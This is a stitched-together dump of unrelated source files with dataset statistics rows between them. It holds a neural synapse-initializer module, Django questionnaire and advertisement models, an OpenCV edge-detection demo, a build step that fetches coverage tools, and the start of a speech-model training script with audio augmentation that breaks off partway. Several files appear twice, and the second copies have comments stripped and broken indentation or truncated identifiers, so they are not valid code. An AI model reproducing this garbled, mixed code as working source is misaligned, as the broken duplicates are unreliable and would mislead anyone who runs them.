      num_channels = int(params.shape[-2])
    v = random_fn(shape=params.shape)
    apply_scale = scale(params) if callable(scale) else scale
    r = v * apply_scale + bias
    # NOTE(review): as in random_initializer, num_channels is only bound when
    # rank >= 3; scale_by_channels=True with a lower-rank shape -> NameError.
    if scale_by_channels:
      r = r / (num_channels ** 0.5)
    return r
  return impl
def create_synapse_init_fns(
    layers,
    initializer):
  """Generates network synapse initializers.

  Arguments:
    layers: Sequence of network layers (used for shape calculation).
    initializer: SynapseInitializer used to initialize synapse tensors.
  Returns:
    A list of functions that produce synapse tensors for all layers upon
    execution.
  """
  synapse_init_fns = []
  for pre, post in zip(layers, layers[1:]):
    # shape: population_dims, batch_size, in_channels, neuron_state
    pop_dims = pre.shape[:-3]
    # -2: is the number of channels
    # +1 reserves an extra channel (used as the bias row/column elsewhere,
    # see synapse_submatrix's include_bias handling).
    num_inputs = pre.shape[-2] + post.shape[-2] + 1
    # -1: is the number of states in a single neuron.
    synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
    params = SynapseInitializerParams(
        shape=synapse_shape,
        in_neurons=pre.shape[-2],
        out_neurons=post.shape[-2])
    synapse_init_fns.append(ft.partial(initializer, params))
  return synapse_init_fns
def create_synapses(layers,
                    initializer):
  """Materializes synapse tensors for every adjacent pair of layers.

  Arguments:
    layers: Sequence of network layers (used for shape calculation).
    initializer: SynapseInitializer used to initialize synapse tensors.
  Returns:
    A list of created synapse tensors for all layers.
  """
  init_fns = create_synapse_init_fns(layers, initializer)
  return [make_synapse() for make_synapse in init_fns]
def transpose_synapse(synapse, env):
  """Swaps the two channel axes of a synapse tensor.

  The trailing three axes are (channels, channels, state); all leading axes
  are treated as batch dimensions and keep their positions.
  """
  batch_rank = len(synapse.shape[:-3])
  perm = list(range(batch_rank))
  perm.extend([batch_rank + 1, batch_rank, batch_rank + 2])
  return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
                      in_channels,
                      update_type,
                      include_bias = True):
  """Returns a submatrix of a synapse matrix given the update type.

  The last three axes are (row-channel, col-channel, state); the first
  in_channels (+1 bias) rows/cols are the input side, the rest the output side.

  NOTE(review): falls through and implicitly returns None for UpdateType.BOTH
  and UpdateType.NONE — confirm callers only ever pass FORWARD/BACKWARD.
  """
  bias = 1 if include_bias else 0
  if update_type == UpdateType.FORWARD:
    return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
  if update_type == UpdateType.BACKWARD:
    # NOTE(review): this branch hard-codes `+ 1` instead of `+ bias`, so the
    # forward/backward slices are asymmetric when include_bias=False —
    # verify whether that is intentional.
    return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
                            env):
  """Assembles the block matrix [[0, fwd], [bwd, 0]] over the channel axes.

  `in_out_synapse` has trailing shape (out, in, states) and `out_in_synapse`
  the transposed channel shape; the result is square over (in + out) channels.
  """
  batch_dims = in_out_synapse.shape[:-3]
  out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
  zeros_out = env.zeros((*batch_dims, out_channels, out_channels, num_states))
  zeros_in = env.zeros((*batch_dims, in_channels, in_channels, num_states))
  top_row = env.concat([zeros_out, in_out_synapse], axis=-2)
  bottom_row = env.concat([out_in_synapse, zeros_in], axis=-2)
  return env.concat([top_row, bottom_row], axis=-3)
def sync_all_synapses(synapses, layers, env):
  """Sync synapses across all layers.

  For each synapse, syncs its first state forward synapse with backward synapse
  and copies it across all the states.

  Args:
    synapses: list of synapses in the network.
    layers: list of layers in the network (layers[i] provides the input
      channel count for synapses[i]).
    env: Environment
  Returns:
    Synchronized synapses (the input list, updated in place).
  """
  for i in range(len(synapses)):
    synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
  return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
  """Copies forward synapse to backward one.

  Extracts the forward (in->out) submatrix and rebuilds the full square
  synapse with the backward block set to the forward block's transpose.
  """
  in_out_synapse = synapse_submatrix(
      synapse,
      in_channels=in_channels,
      update_type=UpdateType.FORWARD,
      include_bias=True)
  return combine_in_out_synapses(
      in_out_synapse,
      transpose_synapse(in_out_synapse, env),
      env)
def sync_states_synapse(synapse, env, num_states=None):
  """Broadcasts the synapse's first state across all (num_states) states."""
  if num_states is None:
    num_states = synapse.shape[-1]
  first_state = synapse[Ellipsis, 0]
  return env.stack([first_state] * num_states, axis=-1)
def normalize_synapses(synapses,
                       rescale_to,
                       env,
                       axis = -3):
  """L2-normalizes synapses along `axis`, then optionally rescales.

  The default axis=-3 normalizes across the input-neuron dimension. Uses
  in-place augmented assignment, so a mutable input (e.g. np.ndarray) is
  modified and also returned.
  """
  # 1e-9 guards against division by zero for all-zero slices.
  norm = env.sqrt(env.sum(synapses ** 2, axis=axis, keepdims=True) + 1e-9)
  synapses /= norm
  if rescale_to is not None:
    synapses *= rescale_to
  return synapses
| 31.43083 | 80 | 0.689764 |
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform(
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
pop_dims = pre.shape[:-3]
num_inputs = pre.shape[-2] + post.shape[-2] + 1
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1)
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| true | true |
f71936663f2310c9c86574acc5b1c59f865d0108 | 3,113 | py | Python | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | null | null | null | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | null | null | null | questionnaire/models.py | cjz25/cquestionnaire | 961c508d463a8d9d50c8485fa65c4a9d3a56e5fa | [
"MIT"
] | 1 | 2021-10-15T12:51:01.000Z | 2021-10-15T12:51:01.000Z | from django.db import models
# from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class Questionnaire(models.Model):
    """A survey form: a titled collection of questions."""
    title = models.CharField(max_length=50)
    description = models.TextField(blank=True, default='')
    # created_by = models.ForeignKey(User, on_delete=models.CASCADE)
    updated_dtm = models.DateTimeField(auto_now=True)
    def __str__(self):
        return self.title
class Question(models.Model):
    """A single question belonging to a Questionnaire."""
    # short answer, multiple choice, checkboxes
    # https://docs.djangoproject.com/en/3.1/ref/models/fields/#enumeration-types
    class QuestionType(models.TextChoices):
        SHORT_ANSWER = 'SA', _('Short Answer')
        MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
        CHECKBOXES = 'CB', _('Checkboxes')
    questionnaire = models.ForeignKey(
        Questionnaire,
        on_delete=models.CASCADE,
        related_name='questions'
    )
    title = models.CharField(max_length=50)
    description = models.TextField(blank=True, default='')
    # Whether the respondent must answer this question.
    required = models.BooleanField()
    question_type = models.CharField(
        max_length=2,
        choices=QuestionType.choices,
        default=QuestionType.SHORT_ANSWER,
    )
    # Soft-hide flag: invisible questions stay in the DB but are not shown.
    visible = models.BooleanField()
    def __str__(self):
        return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
    """Display order (seq) of a question within a questionnaire."""
    questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    seq = models.PositiveSmallIntegerField(default=0)
    class Meta:
        unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
    """A selectable option for a multiple-choice/checkbox question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
    item = models.CharField(max_length=100)
    def __str__(self):
        return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
    """Display order (seq) of a choice within a question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
    seq = models.PositiveSmallIntegerField(default=0)
    class Meta:
        unique_together = (('question', 'questionchoice'),)
# response master: one row per submitted questionnaire response.
class QuestionResponseMaster(models.Model):
    questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
# response detail: one row per answered question within a response.
# NOTE(review): naming a ForeignKey field `response_master_id` makes Django
# create a `response_master_id_id` DB column; renaming would require a
# migration, so it is only flagged here.
class QuestionResponseDetail(models.Model):
    response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
# response for question types: multiple choice, checkboxes
# (one row per selected choice; checkboxes may have several rows per detail).
class QuestionResponseSelection(models.Model):
    response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
    choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
# response for question type: short answer (free-text value).
class QuestionResponseText(models.Model):
    response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
    text = models.TextField()
| 33.836957 | 92 | 0.73948 | from django.db import models
from django.utils.translation import gettext_lazy as _
class Questionnaire(models.Model):
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
updated_dtm = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Question(models.Model):
nType(models.TextChoices):
SHORT_ANSWER = 'SA', _('Short Answer')
MULTIPLE_CHOICE = 'MC', _('Multiple Choice')
CHECKBOXES = 'CB', _('Checkboxes')
questionnaire = models.ForeignKey(
Questionnaire,
on_delete=models.CASCADE,
related_name='questions'
)
title = models.CharField(max_length=50)
description = models.TextField(blank=True, default='')
required = models.BooleanField()
question_type = models.CharField(
max_length=2,
choices=QuestionType.choices,
default=QuestionType.SHORT_ANSWER,
)
visible = models.BooleanField()
def __str__(self):
return f'{self.questionnaire.title} | {self.title}'
class QuestionSequence(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('questionnaire', 'question'),)
class QuestionChoice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='choices')
item = models.CharField(max_length=100)
def __str__(self):
return f'{self.question.title} | {self.item}'
class QuestionChoiceSequence(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
questionchoice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
seq = models.PositiveSmallIntegerField(default=0)
class Meta:
unique_together = (('question', 'questionchoice'),)
class QuestionResponseMaster(models.Model):
questionnaire = models.ForeignKey(Questionnaire, on_delete=models.CASCADE)
class QuestionResponseDetail(models.Model):
response_master_id = models.ForeignKey(QuestionResponseMaster, on_delete=models.CASCADE)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| true | true |
f7193789b5657ecbc5688792c3078421cbb68e5f | 1,193 | py | Python | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/contents/models.py | 0-pangda/meiduo_project1 | 69d771d9c5b67c01510ecfabe4c28989e44d0fba | [
"MIT"
] | null | null | null | from django.db import models
from meiduo_mall.utils.models import BaseModel
# Create your models here.
class ContentCategory(BaseModel):
    """Advertisement content category (广告内容类别)."""
    name = models.CharField(max_length=50, verbose_name='名称')
    # Template lookup key for this category's content block.
    key = models.CharField(max_length=50, verbose_name='类别键名')
    class Meta:
        db_table = 'tb_content_category'
        verbose_name = '广告内容类别'
        verbose_name_plural = verbose_name
    def __str__(self):
        return self.name
class Content(BaseModel):
    """Advertisement content item (广告内容) shown under a ContentCategory."""
    category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
    title = models.CharField(max_length=100, verbose_name='标题')
    url = models.CharField(max_length=300, verbose_name='内容链接')
    image = models.ImageField(null=True, blank=True, verbose_name='图片')
    text = models.TextField(null=True, blank=True, verbose_name='内容')
    # Ordering weight within the category.
    sequence = models.IntegerField(verbose_name='排序')
    status = models.BooleanField(default=True, verbose_name='是否展示')
    class Meta:
        db_table = 'tb_content'
        verbose_name = '广告内容'
        verbose_name_plural = verbose_name
    def __str__(self):
        # Fixed: the original line had export residue ("| 32.24… |") fused onto
        # it, which made this statement a SyntaxError.
        return self.category.name + ': ' + self.title
from meiduo_mall.utils.models import BaseModel
class ContentCategory(BaseModel):
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title | true | true |
f719378c3733c997ba58b7324d53b78e85a768f4 | 301 | py | Python | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | null | null | null | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | null | null | null | opencv-python/ex6_image_canny.py | jemygraw/opencv-tutorial | 2b85b5bf4b1e6ba416733a5b903752462101725e | [
"MIT"
] | 2 | 2019-06-03T16:07:03.000Z | 2019-07-24T08:36:00.000Z | import cv2
# Hard-coded sample image; adjust to a local path when running this demo.
fname = '/Users/jemy/Documents/github-avatar.png'
# Fixed: cv2.CAP_MODE_GRAY is a VideoCapture property, not an imread flag;
# IMREAD_GRAYSCALE is the correct constant for loading a grayscale image.
img = cv2.imread(fname, cv2.IMREAD_GRAYSCALE)
if img is None:
    raise SystemExit('Could not read image: %s' % fname)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
# Canny edge detection with hysteresis thresholds (0, 100).
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| 20.066667 | 49 | 0.744186 | import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| true | true |
f71939e1d16adffd88e34ce88da8f38f90363eca | 2,079 | py | Python | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 7 | 2017-12-28T11:19:15.000Z | 2020-03-23T19:15:31.000Z | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 99 | 2018-01-09T23:56:13.000Z | 2020-11-03T05:20:55.000Z | scripts/sdk_fetch_coverage_tools.py | PelionIoT/mbed-cloud-sdk-java | cc99c51db43cc9ae36601f20f20b7d8cd7515432 | [
"Apache-2.0"
] | 5 | 2018-08-02T06:29:18.000Z | 2019-10-23T11:43:59.000Z | #!/usr/bin/python
import os
import sdk_common
# Block in charge of fetching code coverage tools
# Block in charge of fetching code coverage tools
class SDKCoverageToolsFetcher(sdk_common.BuildStepUsingGradle):
    """Build step that fetches the JaCoCo coverage tools when coverage is enabled."""

    def __init__(self, logger=None):
        super(SDKCoverageToolsFetcher, self).__init__('SDK Coverage tools fetch', logger)
        # Whether this build is configured to collect code coverage at all.
        self.is_code_coverage = self.common_config.get_config().should_perform_code_coverage()
        # Parser over the artifact log where tool/result locations are recorded.
        self.artifacts_parser = self.common_config.get_config().get_new_artifact_log_parser(self)
        self.jacoco_cli_name = 'jacococli.jar'

    def retrieve_folder_location(self, key):
        """Returns the cleaned path recorded under `key`, or None when no key given."""
        if not key:
            return None
        self.artifacts_parser.load()
        return self.clean_path(
            self.artifacts_parser.get_property(key),
            False)

    def check_whether_coverage_result_folder_has_been_created(self):
        """True when the recorded coverage results directory exists on disk."""
        code_coverage_result_dir = self.retrieve_folder_location('SDK_COVERAGE_RESULTS_DIR')
        return False if not code_coverage_result_dir else os.path.exists(code_coverage_result_dir)

    def check_whether_tools_have_been_copied(self):
        """True when the tools directory exists and already holds the expected files."""
        code_coverage_tools_dir = self.retrieve_folder_location('SDK_COVERAGE_TOOLS_DIR')
        return False if not code_coverage_tools_dir else (
            os.path.exists(code_coverage_tools_dir) and len(
                os.listdir(code_coverage_tools_dir)) >= 2)  # TODO change if fewer tools are used

    def has_already_been_run(self):
        return self.check_whether_coverage_result_folder_has_been_created() and self.check_whether_tools_have_been_copied()

    def execute(self):
        """Runs the step; returns True on success, False on failure."""
        self.print_title()
        try:
            if self.is_code_coverage:
                self.log_info("Retrieving code coverage tools")
                if not self.has_already_been_run():
                    self.execute_gradle_task("copyCoverageAgent")
                else:
                    self.log_info("Tools are already present.")
        except Exception as e:
            # Fixed: was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt and hid the failure cause from the log.
            self.log_error('Failed to retrieve code coverage tools: %s' % e)
            return False
        self.log_info("Done.")
        return True
| 40.764706 | 123 | 0.696489 |
import os
import sdk_common
class SDKCoverageToolsFetcher(sdk_common.BuildStepUsingGradle):
def __init__(self, logger=None):
super(SDKCoverageToolsFetcher, self).__init__('SDK Coverage tools fetch', logger)
self.is_code_coverage = self.common_config.get_config().should_perform_code_coverage()
self.artifacts_parser = self.common_config.get_config().get_new_artifact_log_parser(self)
self.jacoco_cli_name = 'jacococli.jar'
def retrieve_folder_location(self, key):
if not key:
return None
self.artifacts_parser.load()
return self.clean_path(
self.artifacts_parser.get_property(key),
False)
def check_whether_coverage_result_folder_has_been_created(self):
code_coverage_result_dir = self.retrieve_folder_location('SDK_COVERAGE_RESULTS_DIR')
return False if not code_coverage_result_dir else os.path.exists(code_coverage_result_dir)
def check_whether_tools_have_been_copied(self):
code_coverage_tools_dir = self.retrieve_folder_location('SDK_COVERAGE_TOOLS_DIR')
return False if not code_coverage_tools_dir else (
os.path.exists(code_coverage_tools_dir) and len(
os.listdir(code_coverage_tools_dir)) >= 2)
def has_already_been_run(self):
return self.check_whether_coverage_result_folder_has_been_created() and self.check_whether_tools_have_been_copied()
def execute(self):
self.print_title()
try:
if self.is_code_coverage:
self.log_info("Retrieving code coverage tools")
if not self.has_already_been_run():
self.execute_gradle_task("copyCoverageAgent")
else:
self.log_info("Tools are already present.")
except:
self.log_error('Failed to retrieving code coverage tools')
return False
self.log_info("Done.")
return True
| true | true |
f7193a1de09a2338512e1f71556799b0418fb19a | 683 | py | Python | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | app/core/migrations/0002_tag.py | bwanarm/recipe-app-api | 1204280495547ceb93a59cd2ec2b1c2a82ef187d | [
"MIT"
] | null | null | null | # Generated by Django 2.1.15 on 2020-07-31 13:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 28.458333 | 118 | 0.616398 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f7193a2229b00e7439ffb31eaf7bc0964fc3bb54 | 10,877 | py | Python | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | pretrained-model/stt/hubert/conformer-tiny-ctc.py | ishine/malaya-speech | fd34afc7107af1656dff4b3201fa51dda54fde18 | [
"MIT"
] | null | null | null | import os
# Pin this job to GPU index 3; must be set before TensorFlow is imported below.
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import pyroomacoustics as pra
import numpy as np
from pydub import AudioSegment
from sklearn.utils import shuffle
from glob import glob
import random
import json
from malaya_speech.train.model.conformer.model import Model as ConformerModel
from malaya_speech.train.model import hubert, ctc
import malaya_speech.train as train
import malaya_speech.config
import malaya_speech.augmentation.waveform as augmentation
import malaya_speech
import tensorflow as tf
import os
import string
# Audio sample rate (Hz) used throughout this script.
sr = 16000
# Maximum clip length in seconds; longer examples are skipped by generate().
maxlen = 18
# Minimum transcript length in characters; shorter examples are skipped.
minlen_text = 1
# NOTE(review): prob_aug is defined but not referenced in the visible code.
prob_aug = 0.95
# Character vocabulary: index 0 is the empty string (presumably the CTC
# blank — confirm), then a-z, 0-9, and space.
unique_vocab = [''] + list(string.ascii_lowercase + string.digits) + [' ']
def augment_room(y, scale=1.0):
    """Simulates room reverberation on waveform `y` with pyroomacoustics.

    Builds a 3 x 5 (x `scale`) meter shoebox room extruded to 3.5 m, places
    the source and a single microphone inside, and returns the simulated
    microphone signal.
    """
    # Floor plan corners (2D), transposed to the (2, n_corners) layout
    # pyroomacoustics expects.
    corners = np.array(
        [[0, 0], [0, 5 * scale], [3 * scale, 5 * scale], [3 * scale, 0]]
    ).T
    room = pra.Room.from_corners(
        corners,
        fs=sr,
        materials=pra.Material(0.2, 0.15),
        ray_tracing=True,
        air_absorption=True,
    )
    # Give the room a ceiling at 3.5 m with the same wall material.
    room.extrude(3.5, materials=pra.Material(0.2, 0.15))
    room.set_ray_tracing(
        receiver_radius=0.5, n_rays=1000, energy_thres=1e-5
    )
    room.add_source([1.5 * scale, 4 * scale, 0.5], signal=y)
    R = np.array([[1.5 * scale], [0.5 * scale], [0.5]])
    room.add_microphone(R)
    room.simulate()
    # Single microphone -> first (only) channel of the simulated signals.
    return room.mic_array.signals[0]
def random_amplitude_threshold(sample, low=1, high=2, threshold=0.4):
    """Randomly amplifies only the loud samples (|x| >= threshold).

    A single gain is drawn from U(low, high), applied to the samples whose
    magnitude reaches `threshold`, and the result is clipped to [-1, 1].
    The input array is not modified.
    """
    gain = np.random.uniform(low=low, high=high)
    boosted = sample.copy()
    loud = np.abs(boosted) >= threshold
    boosted[loud] = boosted[loud] * gain
    return np.clip(boosted, -1, 1)
def add_uniform_noise(
    sample, power=0.01, return_noise=False, scale=False
):
    """Adds random noise to `sample`; optionally peak-normalizes the result.

    NOTE(review): despite the name, the noise samples are Gaussian
    (np.random.normal); only the amplitude factor is uniform.
    """
    y_noise = sample.copy()
    # NOTE(review): np.amax is the signed maximum, not max(|y|) — an
    # all-negative signal yields a negative noise amplitude. Confirm intent.
    noise_amp = power * np.random.uniform() * np.amax(y_noise)
    noise = noise_amp * np.random.normal(size=y_noise.shape[0])
    y_noise = y_noise + noise
    if scale:
        y_noise = y_noise / (np.max(np.abs(y_noise)) + 1e-9)
    if return_noise:
        if scale:
            # NOTE(review): this divides by the max of the *already normalized*
            # y_noise (~1), so the noise is barely rescaled; the pre-scaling
            # denominator was probably intended — verify before changing.
            noise = noise / (np.max(np.abs(y_noise)) + 1e-9)
        return y_noise, noise
    else:
        return y_noise
def calc(signal, add_uniform=True):
    """Applies one randomly chosen audio augmentation to `signal`.

    Picks uniformly among 11 branches (sox EQ/reverb variants, amplitude
    thresholding, low/high/band-pass filters, room simulation, or identity),
    then with ~24% probability each optionally applies extra amplitude
    boosting and uniform-ish noise on top.
    """
    choice = random.randint(0, 10)
    # NOTE(review): leftover debug print in the data pipeline; consider
    # removing or switching to logging before long training runs.
    print('choice', choice)
    if choice == 0:
        x = augmentation.sox_augment_high(
            signal,
            min_bass_gain=random.randint(25, 50),
            reverberance=random.randint(0, 80),
            hf_damping=10,
            room_scale=random.randint(0, 50),
            negate=1,
        )
    if choice == 1:
        x = augmentation.sox_augment_high(
            signal,
            min_bass_gain=random.randint(25, 70),
            reverberance=random.randint(0, 80),
            hf_damping=10,
            room_scale=random.randint(0, 50),
            negate=0,
        )
    if choice == 2:
        x = augmentation.sox_augment_low(
            signal,
            min_bass_gain=random.randint(5, 30),
            reverberance=random.randint(0, 80),
            hf_damping=10,
            room_scale=random.randint(0, 50),
            negate=random.randint(0, 1),
        )
    if choice == 3:
        x = augmentation.sox_augment_combine(
            signal,
            min_bass_gain_high=random.randint(25, 70),
            min_bass_gain_low=random.randint(5, 30),
            reverberance=random.randint(0, 80),
            hf_damping=10,
            room_scale=random.randint(0, 90),
        )
    if choice == 4:
        x = augmentation.sox_reverb(
            signal,
            reverberance=random.randint(10, 80),
            hf_damping=10,
            room_scale=random.randint(10, 90),
        )
